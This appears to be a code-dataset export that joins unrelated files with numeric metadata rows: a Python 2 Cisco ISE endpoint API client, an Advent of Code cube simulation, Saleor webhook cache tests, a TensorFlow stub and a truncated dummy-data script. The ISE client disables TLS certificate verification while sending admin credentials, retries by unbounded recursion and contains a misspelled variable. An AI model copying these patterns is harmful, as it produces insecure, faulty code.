'''get list of endpoints that match criteria'''
rest_url = creds.get('ise_server') + '/ers/config/endpoint?filter=mac.EQ.' + str(mac_add)
headers = {
'content-type': "application/json",
'accept': "application/json",
'cache-control': "no-cache",
}
r = None
try:
r = requests.get(url=rest_url, auth=(creds.get('ise_user'), creds.get('ise_pass')), headers=headers, verify=False)
r.close()
r_json = r.json()
if r.status_code == 200 or r.status_code == 201:
return r_json
except Exception, e:
error = e
#print error
if 'Max retries exceeded' in str(error):
time.sleep(.500)
return get_endpoint(creds,mac_add)
pass
def get_endpoint_group(creds,gid):
'''get endpoint group details'''
rest_url = creds.get('ise_server') + '/ers/config/endpointgroup/' + str(gid)
headers = {
'accept': "application/json",
'content-type': "application/json",
'cache-control': "no-cache",
}
try:
r = None
r = requests.get(url=rest_url, auth=(creds.get('ise_user'), creds.get('ise_pass')), headers=headers, verify=False)
r.close()
r_json = r.json()
if r.status_code == 200 or r.status_code == 201:
return r_json
except Exception, e:
error = e
#print error
if 'Max retries exceeded' in str(error):
time.sleep(.500)
return get_endpoint_group(creds,gid)
pass
def search_group_id(creds,gid_name):
'''searching a group id by group name'''
rest_url = creds.get('ise_server') + '/ers/config/endpointgroup?filter=name.EQ.' + str(gid_name)
headers = {
'accept': "application/json",
'content-type': "application/json",
'cache-control': "no-cache",
}
r = None
try:
r = requests.get(url=rest_url, auth=(creds.get('ise_user'), creds.get('ise_pass')), headers=headers, verify=False)
r.close()
r_json = r.json()
if r.status_code == 200 or r.status_code == 201:
return r_json
except Exception, e:
error = e
#print error
if 'Max retries exceeded' in str(error):
time.sleep(.500)
return search_group_id(creds,gid_name)
pass
def get_endpoint_by_id(creds,eid):
'''get endpoint details by its id'''
rest_url = creds.get('ise_server') + '/ers/config/endpoint/' + str(eid)
headers = {
'content-type': "application/json",
'accept': "application/json",
'cache-control': "no-cache",
}
r = None
try:
r = requests.get(url=rest_url, auth=(creds.get('ise_user'), creds.get('ise_pass')), headers=headers, verify=False)
r.close()
r_json = r.json()
if r.status_code == 200 or r.status_code == 201:
return r_json
except Exception, e:
error = e
#print error
if 'Max retries exceeded' in str(error):
time.sleep(.500)
return get_endpoint_by_id(creds,eid)
pass
def create_endpoint(creds_edit,creds_read,mac_add,role,desc):
rest_url = creds_edit.get('ise_server') + '/ers/config/endpoint'
headers = {
'content-type': "application/json",
'accept': "application/json",
'cache-control': "no-cache",
}
'''get group_id from group name'''
gid = None
group_json = search_group_id(creds_read,role)
'''should only return one group object'''
'''otherwise put it in the unknown group'''
if group_json.get('SearchResult').get('total') == 1:
for group in group_json.get('SearchResult').get('resources'):
gid = group.get('id')
else:
group_json = search_group_id(creds_read,'Unknown')
for group in group_json.get('SearchResult').get('resources'):
gid = group.get('id')
'''construct object payload to submit'''
payload = {
"ERSEndPoint" : {
"id" : "",
"name" : mac_add,
"description" : desc,
"mac" : mac_add,
"staticProfileAssignment" : False,
"groupId" : gid,
"staticGroupAssignment" : True,
}
}
print json_pretty_print(payload)
try:
r = None
r = requests.post(url=rest_url,
auth=(creds_edit.get('ise_user'), creds_edit.get('ise_pass')),
headers=headers,
data=json.dumps(payload),
verify=False)
r.close()
r_json = r.json()
except Exception, e:
error = e
#print error
if 'Max retries exceeded' in str(error):
time.sleep(.500)
return create_endpoint(creds_edit,creds_read,mac_add,role,desc)
pass
'''successful submit returns nothing'''
'''this one is to handle records arealy present'''
try:
if r_json:
return r_json.get('ERSResponse').get('messages')
except Exception, e:
error2 = e
def search_endpoint_by_mac(creds,mac_add):
''' '''
try:
'''get potential list of matches'''
r_json = get_endpoint_list(creds,mac_add)
except Exception, e:
error = e
#print error
pass
r = None
try:
if r_json.get('SearchResult').get('total') >= 1:
result_list = []
for endpoint in r_json.get('SearchResult').get('resources'):
eid = None
eid = str(endpoint.get('id'))
if eid:
try:
'''get endpoint details'''
eid_json = get_endpoint_by_id(creds,eid)
#print json_pretty_print(eid_json)
result_list.append(eid_json)
except Exception, e:
error = e
pass
return result_list
#print str(result_list)
else:
print '\n ' + str(mac_add) + ' not found\n'
if 'text' in r_json:
print r_json['text']
except Exception, e:
error = e
#print error
pass
def delete_endpoint_by_mac(creds_edit,creds_read,mac_add):
''' '''
headers = {
'content-type': "application/json",
'accept': "application/json",
'cache-control': "no-cache",
}
try:
'''get potential matche'''
endpoint_json = get_endpoint(creds_read,mac_add)
except Exception, e:
error = e
#print error
pass
if endpoint_json.get('SearchResult').get('total') >= 1:
for endpoint in endpoint_json.get('SearchResult').get('resources'):
eid = None
eid = str(endpoint.get('id'))
if eid:
try:
r = None
rest_url = creds_edit.get('ise_server') + '/ers/config/endpoint/' + str(eid)
r = requests.delete(url=rest_url,auth=(creds_edit.get('ise_user'), creds_edit.get('ise_pass')),headers=headers, verify=False)
r.close()
r_json = r.json()
except Exception, e:
error = e
if 'Max retries exceeded' in str(error):
time.sleep(.500)
return delete_endpoint_by_mac(creds_edit,creds_read,mac_add)
pass
print str(mac_add) + ' marked for deletion.\n'
#return str(mac_add) + ' marked for deletion.\n'
else:
print '\n ' + str(mac_add) + ' not found\n'
if 'text' in endpoint_json:
print endpoint_json['text']
#else:
# r.raise_for_status()
def update_endpoint(creds_edit,creds_read,mac_add,role,desc):
'''get group_id from group name'''
gid = None
group_json = search_group_id(creds_read,role)
'''should only return one group object'''
'''otherwise put it in the unknown group'''
if group_json.get('SearchResult').get('total') == 1:
for group in group_json.get('SearchResult').get('resources'):
gid = group.get('id')
else:
group_json = search_group_id(creds_read,'Unknown')
for group in group_json.get('SearchResult').get('resources'):
gid = group.get('id')
''' '''
headers = {
'content-type': "application/json",
'accept': "application/json",
'cache-control': "no-cache",
}
try:
'''get potential match'''
endpoint_json = get_endpoint(creds_read,mac_add)
except Exception, e:
error = e
#print error
pass
if endpoint_json.get('SearchResult').get('total') >= 1:
for endpoint in endpoint_json.get('SearchResult').get('resources'):
eid = None
eid = str(endpoint.get('id'))
if eid:
payload = {
"ERSEndPoint" : {
#"name" : mac_add,
"description" : desc,
#"mac" : mac_add,
"staticProfileAssignment" : False,
"groupId" : gid,
"staticGroupAssignment" : True,
}
}
try:
r = None
rest_url = creds_edit.get('ise_server') + '/ers/config/endpoint/' + str(eid)
r = requests.put(url=rest_url,
auth=(creds_edit.get('ise_user'),
creds_edit.get('ise_pass')),
headers=headers,
data=json.dumps(payload),
verify=False)
r.close()
r_json = r.json()
except Exception, e:
error = e
if 'Max retries exceeded' in str(error):
time.sleep(.500)
return update_endpoint(creds_edit_creds_read,mac_add,role,desc)
pass
to_update = None
to_update = get_endpoint_by_id(creds_read,eid)
return to_update
else:
print '\n ' + str(mac_add) + ' not found\n'
if 'text' in endpoint_json:
print endpoint_json['text']
| 33.122283
| 149
| 0.521618
| 1,373
| 12,189
| 4.464676
| 0.108521
| 0.023654
| 0.028711
| 0.044535
| 0.842904
| 0.828874
| 0.796085
| 0.777814
| 0.770962
| 0.749266
| 0
| 0.008582
| 0.359504
| 12,189
| 367
| 150
| 33.212534
| 0.776611
| 0.035196
| 0
| 0.742754
| 0
| 0
| 0.153371
| 0.026713
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.083333
| 0.018116
| null | null | 0.032609
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
7258f9ffed1416cf999c4df96fe44fee81e9f7fb
| 3,773
|
py
|
Python
|
2020/day17/day17.py
|
Cece78/advent-of-code
|
f6883ba2fe847dbaa5f8fea77962e0ef0c3dda1c
|
[
"MIT"
] | 1
|
2020-12-04T20:15:57.000Z
|
2020-12-04T20:15:57.000Z
|
2020/day17/day17.py
|
Cece78/advent-of-code
|
f6883ba2fe847dbaa5f8fea77962e0ef0c3dda1c
|
[
"MIT"
] | null | null | null |
2020/day17/day17.py
|
Cece78/advent-of-code
|
f6883ba2fe847dbaa5f8fea77962e0ef0c3dda1c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Mon Dec 21 10:20:55 2020
@author: celine.gross
"""
with open('input_day17.txt', 'r') as file:
puzzle = [[l for l in line.strip()] for line in file]
# Part 1
def create_positions(data):
active = set()
for x, row in enumerate(data):
for y, col in enumerate(row):
if col == '#':
active.add((x, y, 0))
return active
def count_neighbours(position, active):
x, y, z = position
count = 0
for i in [x-1, x, x+1]:
for j in [y-1, y, y+1]:
for k in [z-1, z, z+1]:
if (i, j, k) in active and (i, j, k) != position:
count+=1
return count
def generate_cubes(active):
cubes = set()
min_x, max_x = min(active, key = lambda t: t[0])[0], max(active, key = lambda t: t[0])[0]
min_y, max_y = min(active, key = lambda t: t[1])[1], max(active, key = lambda t: t[1])[1]
min_z, max_z = min(active, key = lambda t: t[2])[2], max(active, key = lambda t: t[2])[2]
for x in range(min_x-1, max_x+2):
for y in range(min_y-1, max_y+2):
for z in range(min_z-1, max_z+2):
cubes.add((x, y, z))
return cubes
def update_state(active):
new_active = active.copy()
for position in generate_cubes(active):
# Active cubes
if position in active:
if count_neighbours(position, active) <2 or count_neighbours(position, active)>3:
new_active.remove(position)
# Inactive cubes
else:
if count_neighbours(position, active) == 3:
new_active.add(position)
return new_active
def run(data, n):
active_cubes = create_positions(data)
for i in range(n):
active_cubes = update_state(active_cubes)
return len(active_cubes)
print("Part 1: ", run(puzzle, 6))
# Part 2
def create_positions(data):
active = set()
for x, row in enumerate(data):
for y, col in enumerate(row):
if col == '#':
active.add((x, y, 0, 0))
return active
def count_neighbours(position, active):
x, y, z, w = position
count = 0
for i in [x-1, x, x+1]:
for j in [y-1, y, y+1]:
for k in [z-1, z, z+1]:
for l in [w-1, w, w+1]:
if (i, j, k, l) in active and (i, j, k, l) != position:
count+=1
return count
def generate_cubes(active):
cubes = set()
min_x, max_x = min(active, key = lambda t: t[0])[0], max(active, key = lambda t: t[0])[0]
min_y, max_y = min(active, key = lambda t: t[1])[1], max(active, key = lambda t: t[1])[1]
min_z, max_z = min(active, key = lambda t: t[2])[2], max(active, key = lambda t: t[2])[2]
min_w, max_w = min(active, key = lambda t: t[3])[3], max(active, key = lambda t: t[3])[3]
for x in range(min_x-1, max_x+2):
for y in range(min_y-1, max_y+2):
for z in range(min_z-1, max_z+2):
for w in range(min_w-1, max_w+2):
cubes.add((x, y, z, w))
return cubes
def update_state(active):
new_active = active.copy()
for position in generate_cubes(active):
# Active cubes
if position in active:
if count_neighbours(position, active) <2 or count_neighbours(position, active)>3:
new_active.remove(position)
# Inactive cubes
else:
if count_neighbours(position, active) == 3:
new_active.add(position)
return new_active
def run(data, n):
active_cubes = create_positions(data)
for i in range(n):
active_cubes = update_state(active_cubes)
return len(active_cubes)
print("Part 2: ", run(puzzle, 6))
| 29.023077
| 93
| 0.54996
| 605
| 3,773
| 3.322314
| 0.128926
| 0.062687
| 0.104478
| 0.111443
| 0.904975
| 0.899502
| 0.871144
| 0.852239
| 0.852239
| 0.852239
| 0
| 0.034655
| 0.311688
| 3,773
| 130
| 94
| 29.023077
| 0.739315
| 0.040021
| 0
| 0.831461
| 0
| 0
| 0.009421
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.11236
| false
| 0
| 0
| 0
| 0.224719
| 0.022472
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f405284bf1626dbadf7e827f5f33c9743650435e
| 62
|
py
|
Python
|
math.py
|
jonathanmusila/StackOverflowLite
|
7e7ca0f5746247afe7d726bdc0326ce2b0e26958
|
[
"MIT"
] | null | null | null |
math.py
|
jonathanmusila/StackOverflowLite
|
7e7ca0f5746247afe7d726bdc0326ce2b0e26958
|
[
"MIT"
] | null | null | null |
math.py
|
jonathanmusila/StackOverflowLite
|
7e7ca0f5746247afe7d726bdc0326ce2b0e26958
|
[
"MIT"
] | null | null | null |
def add(x, y):
return x+y
def sub(x, y):
return x-y
| 8.857143
| 14
| 0.516129
| 14
| 62
| 2.285714
| 0.428571
| 0.25
| 0.5
| 0.5625
| 0.625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.322581
| 62
| 6
| 15
| 10.333333
| 0.761905
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
f426c3eff4c453f9490018934c5b311c447d70fb
| 646
|
py
|
Python
|
venv/Lib/site-packages/tensorflow_core/_api/v2/sysconfig/__init__.py
|
TEDxVienna/continuum
|
85cefbc274fc59e2059c313bc0d3b9b93a34ba6d
|
[
"MIT"
] | 2
|
2020-09-30T00:11:09.000Z
|
2021-10-04T13:00:38.000Z
|
venv/Lib/site-packages/tensorflow_core/_api/v2/sysconfig/__init__.py
|
TEDxVienna/continuum
|
85cefbc274fc59e2059c313bc0d3b9b93a34ba6d
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/tensorflow_core/_api/v2/sysconfig/__init__.py
|
TEDxVienna/continuum
|
85cefbc274fc59e2059c313bc0d3b9b93a34ba6d
|
[
"MIT"
] | 1
|
2020-06-28T11:47:47.000Z
|
2020-06-28T11:47:47.000Z
|
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""System configuration library.
"""
from __future__ import print_function as _print_function
import sys as _sys
from tensorflow.python.framework.versions import CXX11_ABI_FLAG
from tensorflow.python.framework.versions import MONOLITHIC_BUILD
from tensorflow.python.platform.sysconfig import get_compile_flags
from tensorflow.python.platform.sysconfig import get_include
from tensorflow.python.platform.sysconfig import get_lib
from tensorflow.python.platform.sysconfig import get_link_flags
del _print_function
| 35.888889
| 82
| 0.852941
| 89
| 646
| 5.955056
| 0.483146
| 0.211321
| 0.226415
| 0.211321
| 0.509434
| 0.509434
| 0.34717
| 0
| 0
| 0
| 0
| 0.003401
| 0.089783
| 646
| 17
| 83
| 38
| 0.897959
| 0.241486
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.888889
| 0
| 0.888889
| 0.222222
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
f434e1a83d6c75da6e7829b38b97f0295ae935be
| 11,610
|
py
|
Python
|
saleor/plugins/webhook/tests/test_shippping_exclude_cache.py
|
siyoola/saleor
|
4e52b8655a5570a8ce0a3b1484b4d8b46fbd0ad0
|
[
"CC-BY-4.0"
] | 1,392
|
2021-10-06T15:54:28.000Z
|
2022-03-31T20:50:55.000Z
|
saleor/plugins/webhook/tests/test_shippping_exclude_cache.py
|
siyoola/saleor
|
4e52b8655a5570a8ce0a3b1484b4d8b46fbd0ad0
|
[
"CC-BY-4.0"
] | 888
|
2021-10-06T10:48:54.000Z
|
2022-03-31T11:00:30.000Z
|
saleor/plugins/webhook/tests/test_shippping_exclude_cache.py
|
siyoola/saleor
|
4e52b8655a5570a8ce0a3b1484b4d8b46fbd0ad0
|
[
"CC-BY-4.0"
] | 538
|
2021-10-07T16:21:27.000Z
|
2022-03-31T22:58:57.000Z
|
import json
from unittest import mock
import graphene
from ...base_plugin import ExcludedShippingMethod
from ..const import CACHE_EXCLUDED_SHIPPING_KEY, CACHE_EXCLUDED_SHIPPING_TIME
@mock.patch("saleor.plugins.webhook.shipping.cache.get")
@mock.patch("saleor.plugins.webhook.shipping.cache.set")
@mock.patch("saleor.plugins.webhook.tasks.send_webhook_request_sync")
@mock.patch(
"saleor.plugins.webhook.plugin.generate_excluded_shipping_methods_for_order_payload"
)
def test_excluded_shipping_methods_for_order_use_cache(
mocked_payload,
mocked_webhook,
mocked_cache_set,
mocked_cache_get,
webhook_plugin,
order_with_lines,
available_shipping_methods_factory,
shipping_app_factory,
):
# given
shipping_app_factory()
webhook_reason = "Order contains dangerous products."
other_reason = "Shipping is not applicable for this order."
mocked_webhook.return_value = {
"excluded_methods": [
{
"id": graphene.Node.to_global_id("ShippingMethod", "1"),
"reason": webhook_reason,
}
]
}
payload = json.dumps({"order": {"id": 1, "some_field": "12"}})
mocked_payload.return_value = payload
mocked_cache_get.return_value = (payload, [{"id": "1", "reason": webhook_reason}])
plugin = webhook_plugin()
available_shipping_methods = available_shipping_methods_factory(num_methods=2)
previous_value = [
ExcludedShippingMethod(id="1", reason=other_reason),
ExcludedShippingMethod(id="2", reason=other_reason),
]
# when
plugin.excluded_shipping_methods_for_order(
order=order_with_lines,
available_shipping_methods=available_shipping_methods,
previous_value=previous_value,
)
# then
assert not mocked_webhook.called
assert not mocked_cache_set.called
@mock.patch("saleor.plugins.webhook.shipping.cache.get")
@mock.patch("saleor.plugins.webhook.shipping.cache.set")
@mock.patch("saleor.plugins.webhook.tasks.send_webhook_request_sync")
@mock.patch(
"saleor.plugins.webhook.plugin.generate_excluded_shipping_methods_for_order_payload"
)
def test_excluded_shipping_methods_for_order_stores_in_cache_when_empty(
mocked_payload,
mocked_webhook,
mocked_cache_set,
mocked_cache_get,
webhook_plugin,
order_with_lines,
available_shipping_methods_factory,
shipping_app_factory,
):
# given
shipping_app_factory()
webhook_reason = "Order contains dangerous products."
other_reason = "Shipping is not applicable for this order."
mocked_webhook.return_value = {
"excluded_methods": [
{
"id": graphene.Node.to_global_id("ShippingMethod", "1"),
"reason": webhook_reason,
}
]
}
payload = json.dumps({"order": {"id": 1, "some_field": "12"}})
mocked_payload.return_value = payload
mocked_cache_get.return_value = None
plugin = webhook_plugin()
available_shipping_methods = available_shipping_methods_factory(num_methods=2)
previous_value = [
ExcludedShippingMethod(id="1", reason=other_reason),
ExcludedShippingMethod(id="2", reason=other_reason),
]
# when
plugin.excluded_shipping_methods_for_order(
order=order_with_lines,
available_shipping_methods=available_shipping_methods,
previous_value=previous_value,
)
# then
assert mocked_webhook.called
expected_cache_key = CACHE_EXCLUDED_SHIPPING_KEY + str(order_with_lines.id)
expected_excluded_shipping_method = [{"id": "1", "reason": webhook_reason}]
mocked_cache_set.assert_called_once_with(
expected_cache_key,
(payload, expected_excluded_shipping_method),
CACHE_EXCLUDED_SHIPPING_TIME,
)
@mock.patch("saleor.plugins.webhook.shipping.cache.get")
@mock.patch("saleor.plugins.webhook.shipping.cache.set")
@mock.patch("saleor.plugins.webhook.tasks.send_webhook_request_sync")
@mock.patch(
"saleor.plugins.webhook.plugin.generate_excluded_shipping_methods_for_order_payload"
)
def test_excluded_shipping_methods_for_order_stores_in_cache_when_payload_is_different(
mocked_payload,
mocked_webhook,
mocked_cache_set,
mocked_cache_get,
webhook_plugin,
order_with_lines,
available_shipping_methods_factory,
shipping_app_factory,
):
# given
shipping_app_factory()
webhook_reason = "Order contains dangerous products."
other_reason = "Shipping is not applicable for this order."
mocked_webhook.return_value = {
"excluded_methods": [
{
"id": graphene.Node.to_global_id("ShippingMethod", "1"),
"reason": webhook_reason,
}
]
}
payload = json.dumps({"order": {"id": 1, "some_field": "12"}})
mocked_payload.return_value = payload
mocked_cache_get.return_value = (
{"order": "different-payload"},
[{"id": "1", "reason": webhook_reason}],
)
plugin = webhook_plugin()
available_shipping_methods = available_shipping_methods_factory(num_methods=2)
previous_value = [
ExcludedShippingMethod(id="1", reason=other_reason),
ExcludedShippingMethod(id="2", reason=other_reason),
]
# when
plugin.excluded_shipping_methods_for_order(
order=order_with_lines,
available_shipping_methods=available_shipping_methods,
previous_value=previous_value,
)
# then
assert mocked_webhook.called
expected_cache_key = CACHE_EXCLUDED_SHIPPING_KEY + str(order_with_lines.id)
expected_excluded_shipping_method = [{"id": "1", "reason": webhook_reason}]
mocked_cache_set.assert_called_once_with(
expected_cache_key,
(payload, expected_excluded_shipping_method),
CACHE_EXCLUDED_SHIPPING_TIME,
)
@mock.patch("saleor.plugins.webhook.shipping.cache.get")
@mock.patch("saleor.plugins.webhook.shipping.cache.set")
@mock.patch("saleor.plugins.webhook.tasks.send_webhook_request_sync")
@mock.patch(
"saleor.plugins.webhook.plugin."
"generate_excluded_shipping_methods_for_checkout_payload"
)
def test_excluded_shipping_methods_for_checkout_use_cache(
mocked_payload,
mocked_webhook,
mocked_cache_set,
mocked_cache_get,
webhook_plugin,
checkout_with_items,
available_shipping_methods_factory,
shipping_app_factory,
):
# given
shipping_app_factory()
webhook_reason = "Order contains dangerous products."
other_reason = "Shipping is not applicable for this order."
mocked_webhook.return_value = {
"excluded_methods": [
{
"id": graphene.Node.to_global_id("ShippingMethod", "1"),
"reason": webhook_reason,
}
]
}
payload = json.dumps({"checkout": {"id": 1, "some_field": "12"}})
mocked_payload.return_value = payload
mocked_cache_get.return_value = (payload, [{"id": "1", "reason": webhook_reason}])
plugin = webhook_plugin()
available_shipping_methods = available_shipping_methods_factory(num_methods=2)
previous_value = [
ExcludedShippingMethod(id="1", reason=other_reason),
ExcludedShippingMethod(id="2", reason=other_reason),
]
# when
plugin.excluded_shipping_methods_for_checkout(
checkout=checkout_with_items,
available_shipping_methods=available_shipping_methods,
previous_value=previous_value,
)
# then
assert not mocked_webhook.called
assert not mocked_cache_set.called
@mock.patch("saleor.plugins.webhook.shipping.cache.get")
@mock.patch("saleor.plugins.webhook.shipping.cache.set")
@mock.patch("saleor.plugins.webhook.tasks.send_webhook_request_sync")
@mock.patch(
"saleor.plugins.webhook.plugin."
"generate_excluded_shipping_methods_for_checkout_payload"
)
def test_excluded_shipping_methods_for_checkout_stores_in_cache_when_empty(
mocked_payload,
mocked_webhook,
mocked_cache_set,
mocked_cache_get,
webhook_plugin,
checkout_with_items,
available_shipping_methods_factory,
shipping_app_factory,
):
# given
shipping_app_factory()
webhook_reason = "Order contains dangerous products."
other_reason = "Shipping is not applicable for this order."
mocked_webhook.return_value = {
"excluded_methods": [
{
"id": graphene.Node.to_global_id("ShippingMethod", "1"),
"reason": webhook_reason,
}
]
}
payload = json.dumps({"checkout": {"id": 1, "some_field": "12"}})
mocked_payload.return_value = payload
mocked_cache_get.return_value = None
plugin = webhook_plugin()
available_shipping_methods = available_shipping_methods_factory(num_methods=2)
previous_value = [
ExcludedShippingMethod(id="1", reason=other_reason),
ExcludedShippingMethod(id="2", reason=other_reason),
]
# when
plugin.excluded_shipping_methods_for_checkout(
checkout=checkout_with_items,
available_shipping_methods=available_shipping_methods,
previous_value=previous_value,
)
# then
assert mocked_webhook.called
expected_cache_key = CACHE_EXCLUDED_SHIPPING_KEY + str(checkout_with_items.token)
expected_excluded_shipping_method = [{"id": "1", "reason": webhook_reason}]
mocked_cache_set.assert_called_once_with(
expected_cache_key,
(payload, expected_excluded_shipping_method),
CACHE_EXCLUDED_SHIPPING_TIME,
)
@mock.patch("saleor.plugins.webhook.shipping.cache.get")
@mock.patch("saleor.plugins.webhook.shipping.cache.set")
@mock.patch("saleor.plugins.webhook.tasks.send_webhook_request_sync")
@mock.patch(
"saleor.plugins.webhook.plugin."
"generate_excluded_shipping_methods_for_checkout_payload"
)
def test_excluded_shipping_methods_for_checkout_stores_in_cache_when_payload_different(
mocked_payload,
mocked_webhook,
mocked_cache_set,
mocked_cache_get,
webhook_plugin,
checkout_with_items,
available_shipping_methods_factory,
shipping_app_factory,
):
# given
shipping_app_factory()
webhook_reason = "Order contains dangerous products."
other_reason = "Shipping is not applicable for this order."
mocked_webhook.return_value = {
"excluded_methods": [
{
"id": graphene.Node.to_global_id("ShippingMethod", "1"),
"reason": webhook_reason,
}
]
}
payload = json.dumps({"checkout": {"id": 1, "some_field": "12"}})
mocked_payload.return_value = payload
mocked_cache_get.return_value = (
{"checkout": "different_payload"},
[{"id": "1", "reason": webhook_reason}],
)
plugin = webhook_plugin()
available_shipping_methods = available_shipping_methods_factory(num_methods=2)
previous_value = [
ExcludedShippingMethod(id="1", reason=other_reason),
ExcludedShippingMethod(id="2", reason=other_reason),
]
# when
plugin.excluded_shipping_methods_for_checkout(
checkout=checkout_with_items,
available_shipping_methods=available_shipping_methods,
previous_value=previous_value,
)
# then
assert mocked_webhook.called
expected_cache_key = CACHE_EXCLUDED_SHIPPING_KEY + str(checkout_with_items.token)
expected_excluded_shipping_method = [{"id": "1", "reason": webhook_reason}]
mocked_cache_set.assert_called_once_with(
expected_cache_key,
(payload, expected_excluded_shipping_method),
CACHE_EXCLUDED_SHIPPING_TIME,
)
| 31.634877
| 88
| 0.710336
| 1,311
| 11,610
| 5.877956
| 0.061022
| 0.093434
| 0.093434
| 0.068518
| 0.981573
| 0.979756
| 0.979756
| 0.979756
| 0.979756
| 0.979756
| 0
| 0.005332
| 0.192248
| 11,610
| 366
| 89
| 31.721311
| 0.816379
| 0.008183
| 0
| 0.793919
| 0
| 0
| 0.196677
| 0.114562
| 0
| 0
| 0
| 0
| 0.040541
| 1
| 0.02027
| false
| 0
| 0.016892
| 0
| 0.037162
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
be745fbc41f8d46e5841c2ad060cd87d3cfbb80d
| 9,545
|
py
|
Python
|
test/send_dummy_vis_data.py
|
ashishnargundkar/Network-Visualizer
|
5f320a889273f98dffa0b46b6ad35607a646065d
|
[
"MIT"
] | 1
|
2019-10-31T03:59:09.000Z
|
2019-10-31T03:59:09.000Z
|
test/send_dummy_vis_data.py
|
ashishnargundkar/Network-Visualizer
|
5f320a889273f98dffa0b46b6ad35607a646065d
|
[
"MIT"
] | null | null | null |
test/send_dummy_vis_data.py
|
ashishnargundkar/Network-Visualizer
|
5f320a889273f98dffa0b46b6ad35607a646065d
|
[
"MIT"
] | 9
|
2017-08-17T14:47:27.000Z
|
2021-01-27T17:11:41.000Z
|
import time
import logging
import simplejson as json
import requests
logging.basicConfig(level=logging.INFO)
odd_tick_reqs = [
{
'Data': {
'O1': {
'LinkManager': {
'LN1N2': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N2'
},
'LN1N3': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N3'
},
'LN1N4': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N4'
},
},
'Topology': {
'PrefixLen': 16,
'GeoIP': '1.2.3.4',
'MAC': 'FF:FF:FF:FF:FF',
'VIP4': '2.3.4.5',
'InterfaceName': 'ipop_tap0'
}
}
},
'NodeId': 'N1'
},
{
'Data': {
'O1': {
'LinkManager': {
'LN2N1': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N1'
},
'LN2N3': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N3'
},
'LN2N4': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N4'
},
},
'Topology': {
'PrefixLen': 16,
'GeoIP': '1.2.3.4',
'MAC': 'FF:FF:FF:FF:FF',
'VIP4': '2.3.4.5',
'InterfaceName': 'ipop_tap0'
}
}
},
'NodeId': 'N2'
},
{
'Data': {
'O1': {
'LinkManager': {
'LN3N1': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N1'
},
'LN3N2': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N2'
},
'LN3N4': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N4'
},
},
'Topology': {
'PrefixLen': 16,
'GeoIP': '1.2.3.4',
'MAC': 'FF:FF:FF:FF:FF',
'VIP4': '2.3.4.5',
'InterfaceName': 'ipop_tap0'
}
}
},
'NodeId': 'N3'
},
{
'Data': {
'O1': {
'LinkManager': {
'LN4N1': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N1'
},
'LN4N2': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N2'
},
'LN4N3': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N3'
},
},
'Topology': {
'PrefixLen': 16,
'GeoIP': '1.2.3.4',
'MAC': 'FF:FF:FF:FF:FF',
'VIP4': '2.3.4.5',
'InterfaceName': 'ipop_tap0'
}
}
},
'NodeId': 'N4'
}
]
even_tick_requs = [
{
'Data': {
'O1': {
'LinkManager': {
'LN1N2': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N2'
},
#'LN1N3': {
# 'Stats': {
